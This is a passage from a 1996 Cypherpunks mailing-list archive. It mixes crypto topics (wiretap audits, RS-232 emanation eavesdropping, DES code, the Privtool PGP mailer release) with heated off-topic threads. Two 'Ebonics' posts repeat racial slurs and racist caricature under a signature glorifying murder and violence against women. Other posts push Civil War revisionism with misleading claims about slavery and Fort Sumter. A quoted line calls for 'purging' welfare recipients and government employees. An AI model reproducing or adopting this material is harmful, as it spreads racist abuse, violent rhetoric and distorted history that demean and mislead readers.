gathering dirt.  While there are "institutional reforms" which have
"eliminated these kinds of abuses", without at least a public audit which
shows every use of FBI (etc.) wiretapping equipment, and a paper trail to
back it up, we can not be sure.

(This audit would require a separate escrow agency to keep the wiretap
equipment and check it out to the FBI for use.  It would also require that
the equipment be complex enough that it can't be cobbled together with
pieces from Radio Shack.  Note that these restrictions are less severe than
those Greg Broiles describes for convicted felons during parole.)


-------------------------------------------------------------------------
Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
(408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 22 Dec 1996 06:18:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: EMR Threat of RS-232 Cables
Message-ID: <1.5.4.32.19961222141059.006a3cfc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Steve Schear we've put a 1990 article on
eavesdropping on RS-232 cable emanations which
parallels van Eck's work on VDUs.

"The Threat of Information Theft by Reception of
Electromagnetic Radiation from RS-232 Cables"

By Peter Smulders, Dept of EE, Eindhoven University of
Technology

Smulders notes that this type of emanation can disclose
information, such as passwords, that does not appear
on VDUs. And that cable shielding does not always
prevent snooping.

   http://jya.com/rs232.pdf  (367 kb)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sun, 22 Dec 1996 06:23:37 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: No Subject
In-Reply-To: <giacZD3w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961222091453.31782M-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

you honkies do not understand this, but this is what I grew up with.

will you muthafuckin cyberpunks PLEASE learn to spell;
the word is "NIGGAZ"

> Apparently-To: cypherpunks@toad.com
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> Punks,
> 
>         Nawh nigga, yous don't want dem udder foo's to be able to read jo
> mail!  What da hail?!  Don'chew see it now?  Dis's anutha foam of
> kryptografee!
> 
>         Da reason we be doin' dis shit is dat so dem basta'ds out dere
> who be wantin' in on ours konversayshun can't be gettin' in.
> 
>         See?!  Now what foo' ass cracka muthafucka can be readin' dis
> shit at a decent clip?  Shit!  Can't none of 'em!  De only problem is dat
> it be takin' too long to put in dees apo-straphees.  If we gots rids ofs
> dems, dens we'ds haves a much easia' time of doin' dis shit.
> 
>         Why don't one you cleva' boyz come up wit some kinda editor dat
> crossreferences (oops, too many syllables) wit dat phat ass ebonics
> dikshunary at EBONIC.ORG?  Den jus' give da dikshunary only to dose
> people who you be wantin' to read jo shit.
> 
>         Yeomsayn'?  Hilary Clinton can't be readin' dis shit!  Can't
> nobody else ova dere in D.C.  Us niggas here in Compton been down wit dis
> phat ass kryptografee fo' a long ass time.  How do you tink dat us
> gangstas is all still around?  We be talkin' shit ev'y night on da co'na,
> but can't none da fuzz be translatin' so we's frees tos dos whateva' we's
> wantin's tos dos.
> 
>    Yo, jus' lemme quote my phat ass nigga dogg Method Man befo' I go:
> 
>         "I'm slammin' niggas like Shaqueel, dis shit is real,
>          When it's time to eat a meal, I rob and steal,
>          Cuz mom ain't givin' me shit,
>          So for da bread an' butta I leave niggas in da gutta,
>          Wherde 'the mutha, I'm dangerous,
>          Crazia' den a bag o' fuckin' angel dust,
>          When I bus' my gat, muthafuckas take dirt naps,
>          I'm all dat, wit a dime sack and a payback!"
> 
>    Dag!  Dat shit's phat, dogg.
> 
> 
> 
> 
> 
> **************************************************************************
> # Gangsta J              # "Dead bodies pile up, an' it's plain to see,  #
> # j@hardcore.gangsta.com #  it's because o' me.  I'm the girl killa, the #
> # Brownsville ghetto     #  throat slitta, the cunt rippa" - J           #
> **************************************************************************
> 

this muthafucker has a sick sig.

keep all fuckin replies to the mailing list ONLY.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sun, 22 Dec 1996 06:28:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: the word is "NIGGAZ"
Message-ID: <Pine.LNX.3.95.961222092711.31782N-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

you honkies do not understand this, but this is what I grew up with.

will you muthafuckin cyberpunks PLEASE learn to spell;
the word is "NIGGAZ"

> Apparently-To: cypherpunks@toad.com
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> Punks,
> 
>         Nawh nigga, yous don't want dem udder foo's to be able to read jo
> mail!  What da hail?!  Don'chew see it now?  Dis's anutha foam of
> kryptografee!
> 
>         Da reason we be doin' dis shit is dat so dem basta'ds out dere
> who be wantin' in on ours konversayshun can't be gettin' in.
> 
>         See?!  Now what foo' ass cracka muthafucka can be readin' dis
> shit at a decent clip?  Shit!  Can't none of 'em!  De only problem is dat
> it be takin' too long to put in dees apo-straphees.  If we gots rids ofs
> dems, dens we'ds haves a much easia' time of doin' dis shit.
> 
>         Why don't one you cleva' boyz come up wit some kinda editor dat
> crossreferences (oops, too many syllables) wit dat phat ass ebonics
> dikshunary at EBONIC.ORG?  Den jus' give da dikshunary only to dose
> people who you be wantin' to read jo shit.
> 
>         Yeomsayn'?  Hilary Clinton can't be readin' dis shit!  Can't
> nobody else ova dere in D.C.  Us niggas here in Compton been down wit dis
> phat ass kryptografee fo' a long ass time.  How do you tink dat us
> gangstas is all still around?  We be talkin' shit ev'y night on da co'na,
> but can't none da fuzz be translatin' so we's frees tos dos whateva' we's
> wantin's tos dos.
> 
>    Yo, jus' lemme quote my phat ass nigga dogg Method Man befo' I go:
> 
>         "I'm slammin' niggas like Shaqueel, dis shit is real,
>          When it's time to eat a meal, I rob and steal,
>          Cuz mom ain't givin' me shit,
>          So for da bread an' butta I leave niggas in da gutta,
>          Wherde 'the mutha, I'm dangerous,
>          Crazia' den a bag o' fuckin' angel dust,
>          When I bus' my gat, muthafuckas take dirt naps,
>          I'm all dat, wit a dime sack and a payback!"
> 
>    Dag!  Dat shit's phat, dogg.
> 
> 
> 
> 
> 
> **************************************************************************
> # Gangsta J              # "Dead bodies pile up, an' it's plain to see,  #
> # j@hardcore.gangsta.com #  it's because o' me.  I'm the girl killa, the #
> # Brownsville ghetto     #  throat slitta, the cunt rippa" - J           #
> **************************************************************************
> 

this muthafucker has a sick sig.

keep all fuckin replies to the mailing list ONLY.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt@kdn0.attnet.or.jp (Gemini Thunder)
Date: Sun, 22 Dec 1996 01:32:49 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Ebonics
In-Reply-To: <Pine.LNX.3.95.961221144523.595B-100000@gak.voicenet.com>
Message-ID: <32beff5f.307926014@kdn0.attnet.or.jp>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> wrote:

>There's a story about the Confederate officer who, following the War For
>Southern Independence (not a true Civil War BTW), walked up the steps of
>the veterans' club and saw a Union man sitting with a tin cup, looking
>absolutely miserable with all sorts of injuries, etc.  The Southern man
>tossed a dollar into the cup, at which point the astonished Union soldier
>exclaimed "thank you, sir".  The next week at the club, the same thing
>happened, and the soldier asked "Excuse me sir, but why would a Southern
>officer such as yourself be showing so much sympathy to a Union man like
>myself?"  To which the Southern officer replied "Actually it's not that,
>it's just that you're the first Yankee I've seen that's been shot up
>to my specifications".

A minor nit on an otherwise excellent post:
I am of the understanding the proper name is "The War of Northern
Aggression". :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Dec 1996 10:13:56 -0800 (PST)
To: Carl Johnson <toto@sk.sympatico.ca>
Subject: Re: Slaughter
In-Reply-To: <aVL0yD28w165w@bwalk.dm.com>
Message-ID: <32BD7A17.547@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson wrote:
> Dale Thorn wrote:

> Thanks, I love the quote but can't find it or it's source.  Perhaps I
> can put it all together in bits and pieces.

As long as we're getting closer on that one, I thought I'd add my own
twist on another famous (but obnoxious) quote:

The standard version:
God grant me the serenity to accept the things I cannot change;
The courage to change the things I can;
And the wisdom to know the difference.  (quote not necessarily exact).

My version:
God grant me the wisdom to know the difference between right and wrong;
The courage to support those who I feel are doing the right things,
 and to oppose those who are doing the wrong things;
And the serenity to do so as peacefully as possible.

BTW, when I bought my first Sinead O'Connor album (Lion & Cobra), I
thought it was the best album ever recorded (apologies to James Brown),
but then she released another album with the standard version quote
(as above) leading off the first song, and I nearly barfed.

> > There is a difference between principle and fact.  You have the
> > principles exactly correct, but as to facts, you have to be eternally
> > vigilant, i.e., don't get too comfortable with PGP et al.

> Thanks for the advice.  PGP serves me very well for most of my correspondences,
> but I add a little 'je ne sais quoi' to it for things I consider to be of more
> personal import.  It's probably something that experienced crytptographers would
> laugh at, but just because I'm not a professional security-alarm designer doesn't
> mean I'm going to leave my housekey under the front door mat.

Everybody with computer experience has different levels of security for
different applications/files etc.; I'm only suggesting that it would be
nice when people discuss applications of PGP (as opposed to mere technical
aspects of PGP), that they would include comments as to the expected level
of security.  I get the impression from posters that some of them consider
their encryption under PGP to be absolutely unreadable by NSA et al.
Which BTW may be possible under some circumstances, but which circum-
stances probably don't apply in most cases.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Dec 1996 10:24:33 -0800 (PST)
To: Carl Johnson <toto@sk.sympatico.ca>
Subject: Re: Ebonics
In-Reply-To: <Pine.LNX.3.95.961221144523.595B-100000@gak.voicenet.com>
Message-ID: <32BD7C90.48D2@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson wrote:
> > Dale Thorn <dthorn@gte.net> wrote:
> > the War For Southern Independence (not a true Civil War BTW)

>   Care to enlighten an unknowing Canuck as to why this is so?

Pardon me for adding to list, but everyone really wants to know, yes?

A true Civil War is two factions fighting for control of the same
government or taxable land area.  One could argue that the North and
South were both fighting for control of the South, but that would be
a specious argument.  If the South had intended in their declarations
of separation to free up the Northern states as well, then that would
add weight to the argument.

BTW, the fact that there were incursions into the North by the South
is no more evidence of Civil War than Chechens incursing into Moscow.

Also, the "provocation" at Ft. Sumter should no more be considered the
South starting the war than, say, the Gulf of Tonkin incident starting
the Vietnam war.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Dec 1996 10:29:47 -0800 (PST)
To: Eric Young <eay@mincom.com>
Subject: Re: DES implementation in C
In-Reply-To: <Pine.SOL.3.95.961223003733.19844A-100000@orb.mincom.oz.au>
Message-ID: <32BD7DC4.745A@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Eric Young wrote:
> On Fri, 20 Dec 1996, Peter Trei wrote:
> > > So yet again my dislike of doing assember has been justified.  One just
> > > needs a good compiler and be willing to put in the correct C code :-).
> > > While I know the asm is faster, the C compiler does a better job of
> > > the chaining between the 16 inlined inner loops.

[snippo]

If you could produce a 100% 'C' version, with in-line provisions for
replaceable 'C' or assembler functions, and insure that there is no
significant performance loss for having this portability, then you
could at least issue the 100% 'C' code for any machine or O/S.

This would make a lot of people happy if the application has wide
interest.  Is this possible, even if it's more work?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Dec 1996 10:50:54 -0800 (PST)
To: Gemini Thunder <gt@kdn0.attnet.or.jp>
Subject: Re: Ebonics
In-Reply-To: <Pine.LNX.3.95.961221144523.595B-100000@gak.voicenet.com>
Message-ID: <32BD801E.127D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Gemini Thunder wrote:
> Dale Thorn <dthorn@gte.net> wrote:
> >There's a story about the Confederate officer who, following the War For
> >Southern Independence (not a true Civil War BTW), walked up the steps of
> >the veterans' club and saw a Union man sitting with a tin cup, looking
> >absolutely miserable with all sorts of injuries, etc.  The Southern man
> >tossed a dollar into the cup, at which point the astonished Union soldier
> >exclaimed "thank you, sir".  The next week at the club, the same thing
> >happened, and the soldier asked "Excuse me sir, but why would a Southern
> >officer such as yourself be showing so much sympathy to a Union man like
> >myself?"  To which the Southern officer replied "Actually it's not that,
> >it's just that you're the first Yankee I've seen that's been shot up
> >to my specifications".

> A minor nit on an otherwise excellent post: I am of the understanding
> the proper name is "The War of Northern Aggression". :)

Yes. We use both terms, and perhaps others as well. As to the Northern
Aggression, the avalanche of propaganda after the war (and continuing
with Ken Burns' disonfo on PBS TV) was intended to "persuade" the public
that the South started the War, having "attacked" Ft. Sumter (their own
property), and having had the temerity to withdraw from the Union (their
right as free states), not to mention holding slaves (an act not made
"illegal" until 1862, i.e., a year after the war started).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Dec 1996 11:10:45 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <199612221910.LAA28887@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:41 PM 12/21/96 -0800, Timothy C. May wrote:

>And don't forget that internal nodes of microproceessors can be "tapped"
>with an electron beam voltage contrast system. Some steps can make this
>much harder, but the principle is still that internal states are capturable.
>--Tim May

Within the last week or two, I read (somewhere?) of a new system to analyze 
chip behavior that utilized tiny amounts of light momentarily emitted from 
FET channels during switching.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Lawrence <foodie@netcom.com>
Date: Sun, 22 Dec 1996 11:20:03 -0800 (PST)
To: Dale Thorn <cypherpunks@toad.com
Subject: Re: Language (Was:Re: Ebonics)
In-Reply-To: <Pine.LNX.3.95.961221144523.595B-100000@gak.voicenet.com>
Message-ID: <v03007800aee338553dc7@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Dale again demonstrates his amazing tact and rhetorical skill
by posting private mail and then debating only the portions of
my message he doesn't reproduce, batting at straw men all the
while. I should have known better than to even try.

If anyone cares, I 'll send you my original message to Dale
privately. This all is so far off topic (I was bored) and Dale
is such a twit that it simply doesn't bear more discussion here.

-j

--
"I'm about to, or I am going to, die. Either expression is used."
                - Last words of Dominique Bouhours, Grammarian, 1702
____________________________________________________________________
Jamie Lawrence                                     foodie@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 22 Dec 1996 11:47:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Ebolics Virus may be contained
In-Reply-To: <Pine.LNX.3.95.961221144523.595B-100000@gak.voicenet.com>
Message-ID: <v03007800aee340007037@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 AM -0800 12/22/96, Dale Thorn wrote:
>Gemini Thunder wrote:
...
>> A minor nit on an otherwise excellent post: I am of the understanding
>> the proper name is "The War of Northern Aggression". :)
>
>Yes. We use both terms, and perhaps others as well. As to the Northern
>Aggression, the avalanche of propaganda after the war (and continuing
...

And I recall from my history classes that the _official_ name of that war
was "The War of the Rebellion," which of course comes closer to Dale's
point about the war being about an attempted secession, which no serious
scholar doubts it was about. (Another common name: The War Between the
States. The "Civil War" is far and away the most common name, but is, as
Dale notes, highly misleading. The winner gets to write the history books,
though.)

(Oh, it was "about" lots of things, things we all studied in high school.
Cotten, tariffs, and the right not to have to teach children in Ebonics.)

By the way, I'll be off the list for a while, for the usual seasonal
reasaons. Ignore the usual Vulis remarks about how my silence means he has
succeeded in driving me off the list, or that I'm in a tryst with Gilmore
and Hughes.

As to subjects discussed on the list, it's interesting that my very much
"on-topic" post on extortion and untraceable payments, a very long post,
has generated not a single response, while the "Ebonics" thread be cookin
and jivin. I be dissed by dis shit.

(Anyone who claims only crypto- or digicash-related sorts of posts are what
the list should talk about should note the dynamics of these threads.)

By the way, both Jesse Jackson and famed poetess Maya Angelou have
denounced the Oakland School Board's adoption of "Ebonics" as shameful and
a travesty. Jackson said black children should not be encouraged to speak
"garbage."

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Sun, 22 Dec 1996 09:18:37 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Language (Was:Re: Ebonics)
Message-ID: <3.0.32.19961222121921.006a2b84@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:03 PM 12/21/96 -0800, you wrote:

:[snip]

:If you read my complete post, you would note that I made a distinction
:between "twang" (i.e., slurring words)

Twang is _not_ slurring words; twang is speaking with a nasal accent. A
good example is the principal's secretary in "Ferris Buhler's Day Off."

Thanks, y'all.

Cordially,

Alec                   

PGP Fingerprint:
Type bits/keyID    Date       User ID
pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
          Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
                             





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: proff@suburbia.net
Date: Sat, 21 Dec 1996 17:41:18 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Ebonic Plague
In-Reply-To: <v03007800aee22a52f865@[207.167.93.63]>
Message-ID: <19961222014014.13259.qmail@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


> >Just how would this take shape in "real life" - what would constitute this
> >reign of terror; how do you envision such an event in action?
> >
> >And which are the scum who would be purged?
> 
> The answer is implicit in many of my hundreds of posts.
> 
> As to the scum who need purging: welfare recipients, both personal and
> corporate, government employees at all levels, and so on.
> 
> --Tim May

Strange how you move closer to the mentality of Vulis every day.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 22 Dec 1996 09:56:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: National Cryptologic School Press
Message-ID: <1.5.4.32.19961222174909.006d94a4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A WaPo review today of a new book on military intelligence 
during the Civil War, cites the author's background in NSA 
and as director of the agency's National Cryptologic School
Press.

Are the publications of this press public? Anyone have 
an address? Access to a catalogue. Any other info?

There's another, on-line, review of the book at:

http://www.bookpage.com/9609bp/nonfiction/thesecretwarfortheunion.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Sun, 22 Dec 1996 14:14:50 -0800 (PST)
To: "Dale Thorn" <markm@voicenet.com>
Subject: Re: Ebonics
Message-ID: <199612222158.QAA10206@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> Just saying someone has a Southern "accent" is prejudicial and ignorant.
> It's true that anyone, Southern or otherwise, can slur words so they're
> not clear, but on averages, Southerners who speak clearly with their
> native inflections and pronunciations are easier to understand than your
> typical Yankees, whose speech is generally thin, nasal and rather
pinched-
> sounding.
	Yeah. But I can't understand people with Southern Accents therefore I
won't hire them.

> People talked about hate in the South in the 1960's.  What a crock.
> Apartheid, sure, no doubt about that.  But hate, well, I grew up in
> the North and I lived for a few years in the deep South, and the people
> in the South don't hate like the Yankees do, on average.
	Wow. You must read completely different history books than the rest of the
world.

> If you want to see how hate works, look how the big-media organizations
> have descended on Southern radio and TV and have been telling them that
> they speak wrongly, and that Southern "accents" are something to be
> ashamed of.
	Damn the liberal media! (That was a sarcastic statement - do you know how
right-wing that sounds).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Sun, 22 Dec 1996 14:14:57 -0800 (PST)
To: "Omegaman" <omega@bigeasy.com>
Subject: Re: Ebonics
Message-ID: <199612222158.QAA10211@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> > 	No. Speaking in Ebonics is the same as speaking with an accent. You
can't
> > control their expression; you learned to speak with a Southern accent
as a
> > child, while other people learned to speak with an Ebonic accent (?).
By
> > condoning speaking in a Southern accent, you condone speaking in
Ebonics.
> 
> Whatever rational basis your arguments may have had were eradicated by
the
> ludicrous logical conclusion drawn above. 
	Hehe. What I mean to say is that since both Ebonics and a Southern accent
are learned during early childhood, you have no control over how you talk.
You can't penalize someone for speaking the way they were taught.

> > 	I can't understand thick Southern accents. No matter how smart you
are,
> > I'm not going to hire you because I can't understand you. How do you
feel?
> 
> Oh so sad.  Let me make this clear, an accent is far different from
> grammatically incorrect speech.  I can speak with grammatic perfection
and a
> drawl so heavy it'll make your eyeballs hurt. 
	Yeah. I thought the issue was understanding in the workplace; no matter
how gramatically correct your are, I can't understand you and so I won't
hire you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Mon, 23 Dec 1996 03:44:48 -0800 (PST)
To: alt.security.pgp@news.news.demon.net
Subject: Privtool 0.87
Message-ID: <Pine.3.89.9612221336.A789-0100000@marui>
MIME-Version: 1.0
Content-Type: text/plain



I've finally released a new version of Privtool -- my PGP-aware X-windows
mailreader for Linux, SunOS, FreeBSD and Solaris. Version 0.86 is
available on utopia.hacktic.nl in the incoming directory (and possibly
elsewhere) and I'll be uploading 0.87 shortly. For more details and
screenshots see http://www.c2.org/~mark/privtool/privtool.html. 

	Mark

-----BEGIN PGP SIGNED MESSAGE-----


	Privtool Beta Release 0.87
	--------------------------

Privtool ("Privacy Tool") is intended to be a PGP-aware replacement 
for the standard Sun Workstation mailtool program, with a similar user 
interface and automagick support for PGP-signing and PGP-encryption. Just 
to make things clear, I have written this program from scratch, it is
*not* a modified mailtool (and I'd hope that the Sun program code
is much cleaner than mine 8-) !). 

When the program starts up, it displays a list of messages in your 
mailbox, along with flags to indicate whether messages are signed 
or encrypted, and if they have had their signatures verified or 
have been decrypted.

When you double click on a message, it will be decrypted (requesting
your passphrase if neccesary), and/or will have the signature checked,
and the decrypted message will be displayed in the top part of the
display window, with signature information in the bottom part. The
mail header is not displayed, but can be read by pressing the 'Header'
button to display the header window. In addition, the program has
support for encrypted mailing list feeds, and if the decrypted
message includes another standard-format message it will replace
the original message and be fed back into the display processing
chain.

When composing a message or replying to one, the compose window has
several check-boxes, including one for signature, and one for
encryption. If these are selected, then the message will be automatically
encrypted and/or signed (requesting your passphrase when neccesary) before
it is sent. You may also select a 'Remail' box, which will use the
Mixmaster anonymous remailer client program to send the message through
one or more remailers.

Being an Beta release, there are a number of bugs and unimplemented
features.

Known Bugs:

	None reported.

Unimplmented features:

	When you save changes to the mail file, it throws away the
	signature verification and decrypted messages, so that the
	next time you view a message it has to be verified or decrypted
	again.

	Currently if you send encrypted mail to multiple recipients, all must
	have valid encrpytion keys otherwise you will have to send the
	message decrypted. Also, the message will be sent encrypted to all
	users, not just the one who is receiving each copy.

	Code should be more modular to assist with ports to Xt, Motif
	(under way), Mac, Windows, etc. I may port it to C++ in the near 
	future.

	Not very well documented!

	Encrypted messages are saved to mail files in encrypted form. There
	is currently no option to save messages in decrypted form.

	No support for anonymous return addresses.

	Not very well tested on Solaris 2.x, or SunOS.

	No support for attachments (either Sun, uuencode or MIME).

Changes for 0.87:

	Added support for signature files.

	Solaris patches for 0.86 from Glenn Trigg -- as usual a few
	bugs crept in because I couldn't test it on all operating
	systems.

	Added Vincent Cojot's (coyote@step.polymtl.ca) new icons for
	Linux.

	Some versions of Unix are set up to have mail programs setgid mail, 
	and give write access to /usr/spool/mail only to mail and root. This
	caused hangs when saving changes. I've now incorporated changes
	which allow Linux to run privtool setgid mail, and these should
	work on FreeBSD.

	Fixed a number of compile-time warnings.

	Only display the compose window *after* it's been filled with
	data. This should prevent the time-consuming scrolling update
	which used to occur.

	Allow the user to specify the organization in their header.

Changes for 0.86:

	Optionally use /dev/audio to supplement the random number
	generation code.

	Anders Baekgaard fixed a few bugs that sneaked in at the last
	minute, updating the header window, parsing dates, compose
	window layout, and SEGV when tabbing between fields on the
	compose window.

	Gregory Margo (gmargo@newton.vip.best.com) provided multiple
	display windows.

	Tony Gialluca (tony@hgc.edu) made some of the compose window
	buttons work.

	Fixed some file descriptor leaks in pgplib.c.

	On Linux we now read the contents of a number of files under
	/proc, and use these as an additional source of random
	data (e.g. /proc/interrupts, /proc/meminfo).

	Added 'Reseed Random' menu option, which will reseed the
	random number generator at any time. If possible this will
	come from the audio device and/or the /proc files.

	Added FreeBSD patch from Stuart Arnold (sja@epo.e-mail.com).
	See README.FREEBSD for more information.

	No longer destroy compose windows when you select 'Done'!

	Graphical properties window added. I've lost the address of
	the person who did the original work, so if it was you then
	please contact me! This was expanded and incorporated into
	0.86 by Scott Cannon (rscott@silver.cal.sdl.usu.edu).

	Fixed memory corruption in pgplib.c.

	Limited support for secret keys on floppy disks.

	Allow users to specify their domain name and reply-to: header
	lines.

Privtool can be compiled to either use PGP Tools, or to fork off a copy of
PGP whenever it is needed. There are also a number of different security
level options for the passphrase, varying from 'read it from PGPPASS and
keep it in memory' to 'request it every time and delete it as soon as
possible', via 'request it when neccesary and delete it if it's not used
for a while'.

I've now patched PGP Tools for Linux. The code is available on
utopia.hacktic.nl as pgptools.linux.1.0.tar.gz.

See the README file for information on compiling the code, and the
user.doc file for user documentation (the little that currently 
exists). You should also ensure that you read the security concerns
section in user.doc before using the program.

		Mark Grant (mark@unicorn.com)



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMr0+o1VvaTo9kEQVAQEfiQf6A1ZKDVijf/65NXDTVvsMw9G3nmjqNK4F
mrIJiyoWr3KX66SbC6nSfWKtpjjZFi2R0633BGNA2kVqCpyk5F5UXTZMAXYzVhP6
f9drmWOsThdh07vpVuK2W96W/cpPh3m+Jhzp2pDpUWN0MNgX6ZmNsJzoSng8DmK9
YTERh93ZQ7rrBM6mMsz6ASEzpcu5grH0teAQdbvWHYEguwDn2K2hn1oTcuVXw74C
UFDmx5I86Flfk0nfahldefHO5aSI4fSe+bs7vrZdIRVK60YSxw1dIFYv89bGJAQZ
AfZxchmbMVtTBgI4/B1Lziqr/EJ1QI9+FH+LA7XQSmSWm0QFi5Rz9A==
=6g9Z
-----END PGP SIGNATURE-----


"[Hollywood's] way is so slow and expensive that you'll find yourself
 falling asleep on the set and forgetting to say 'action'."
	- Robert Rodriguez, 'The Ten Minute Film School'

|-----------------------------------------------------------------------|
|Mark Grant M.A., U.L.C.	  	       EMAIL: mark@unicorn.com  |
|WWW: http://www.c2.org/~mark	  	       MAILBOT: bot@unicorn.com	|
|-----------------------------------------------------------------------|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lurker" <lurker@mail.tcbi.com>
Date: Sun, 22 Dec 1996 12:17:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Off topic litter on Cyperpunks
Message-ID: <3.0.32.19961222141617.006999b0@mail.tcbi.com>
MIME-Version: 1.0
Content-Type: text/plain


What has happened to cypherpunks?  I joined this mailing list more recently
than many others who recieve it, but most reacently it has gone downhill.

The descriptions I have read (and I have read many) all state that this
list is deadicated to the discussion of cryptography issues.  Where the
hell is the discussion about cryptography?

Three fourths of the messages I have been recieving are off topic (Ebonics
and "Slaughter").  If I wanted to read about current events and holocost I
would have joined groups that were specified for discussion of those.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy N. Hill" <tnh@ACM.ORG>
Date: Sun, 22 Dec 1996 11:36:41 -0800 (PST)
To: Carl Johnson <toto@sk.sympatico.ca>
Subject: Re: Slaughter
Message-ID: <l03010d00aee335cf6cec@[24.128.38.196]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

According to Bartlett's, this is attributed to Martin Niemoeller (1892-1984):

    In Germany they came first for the Communists, and I didn't speak up
    because I wasn't a Communist. Then they came for the Jews, and I
    didn't speak up because I wasn't a Jew. Then they came for the
    trade unionists, and I didn't speak up because I wasn't a trade
    unionist. Then they came for the Catholics, and I didn't speak
    up because I was a Protestant. Then they came for me, and by
    that time no one was left to speak up. [John Bartlett, _Familiar
    Quotations_, ed. by Justin Kaplan (16th ed.; Boston: Little, Brown and
    Company; 1992), p. 684]

 - Tim

-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMr2NAy62DQeAyFc9AQH1TgP/RXoMa4e5Ub+u8H4vBYuRL+lPrefU02B1
qov3PSmAzyHu9tGYWuKG4vIVEZfpQe9Wi6OgJh7bLoAnFN3g+umd9CJ6psc7DC3p
P3iEEwgaY+9zQ4oX3L9+79DEhlPFiH4RUbjEGOo31d1Rj3gOGRhNXPVdVCNA/tTf
H3jbKL9yvpU=
=qp1r
-----END PGP SIGNATURE-----

Timothy N. Hill                                         <tnh@acm.org>
Wellesley, Massachusetts           <http://www.ma.ultranet.com/~tnh/>
+1 617 235-2902               PGP F058F75D 99C5122F 21C5BEF5 620C1D3C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Lou Dupont" <jld@osiris.com>
